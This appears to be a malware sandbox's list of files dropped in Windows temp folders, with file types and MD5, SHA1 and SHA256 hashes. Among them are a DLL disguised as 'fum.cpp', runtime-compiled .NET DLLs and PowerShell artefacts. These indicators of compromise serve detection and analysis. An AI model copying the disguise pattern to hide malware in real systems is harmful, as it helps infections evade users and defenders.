C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbwk5wqt.vfi.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkeod5lv.u3f.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\adobe.url	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators	99D9EE4F5137B94435D9BF49726E3D7B	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
C:\Users\user\AppData\Local\Temp\fum.cpp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D48EBF7B31EDDA518CA13F71E876FFB3	C72880C38C6F1A013AA52D032FC712DC63FE29F1	8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
C:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP	MSVC .res	8B6E2C182C19344CA466FE4EDFB44B21	44BFB6115E9FA0FD2D6BD64409A42077A8014025	9FB9732A1690417BE4845F21A71E64DB4B760FE94B1379ED59BCDF864FEF2BDA
C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.0.cs	UTF-8 Unicode (with BOM) text	7504862525C83E379C573A3C2BB810C6	3C7E3F89955F07E061B21107DAEF415E0D0C5F5E	B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	5D44AF3E519C5A16282CFF896C85CAF8	EDFDCE5B0A5C585367CFAC1E24EA3E0EA36EE186	12DB764EA7FCB5D5716D3C0DD06353BBE81C691F10772786D8DCD11A79445462
C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	AC8AFCD9EB22694EA7A8C43BE655DDFC	F2E8FBCCB01BD4403971DB544B618C6516D3A64B	6F35D36FBA380FD88F664FA13250410BC95D18A44BF94F1DEFAFAE0211C03B5B
C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP	MSVC .res	86B76915A14D912A5FE5F5A939B7CD7E	5CB60EED298118272D7FD9A28700A506A1913E82	E64F8FF2FD218D945B2B7321B1291DB887A92FF029C737173F2FA25B0D0868C1
C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.0.cs	UTF-8 Unicode (with BOM) text	C08AF9BD048D4864677C506B609F368E	23B8F42A01326DC612E4205B08115A4B68677045	EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	9B3A6B51F7FC8C0E003FBAE63F0AEA4D	4F86B8B908825BF1E48A1AD353A8BF41924A6C9A	30DA5F229097FA09031FB14C359BC507D7FD823818CF368DFC7C055FE282F06B
C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	A83BCCCD687D06FF023BA84129FC4349	84CEE3E2D71BB5B647B3A3DE6FA00E8CC7FCFD28	584EAF22E0297942960FB50E7EBEEA1F0355A648F11A4A02758DE4C7448AC81A
C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\Documents\20210913\PowerShell_transcript.936905.2Hrty1Wv.20210913110432.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	86F9A3B3EE0686E352A0807887ACEFC7	9DF3C46C22B3B9DDE97CF68014307485882F3B8F	B60254AB4F7A000C932A0EAF14FCDC7F44983F8599969BC4EF241A8BB02BA37E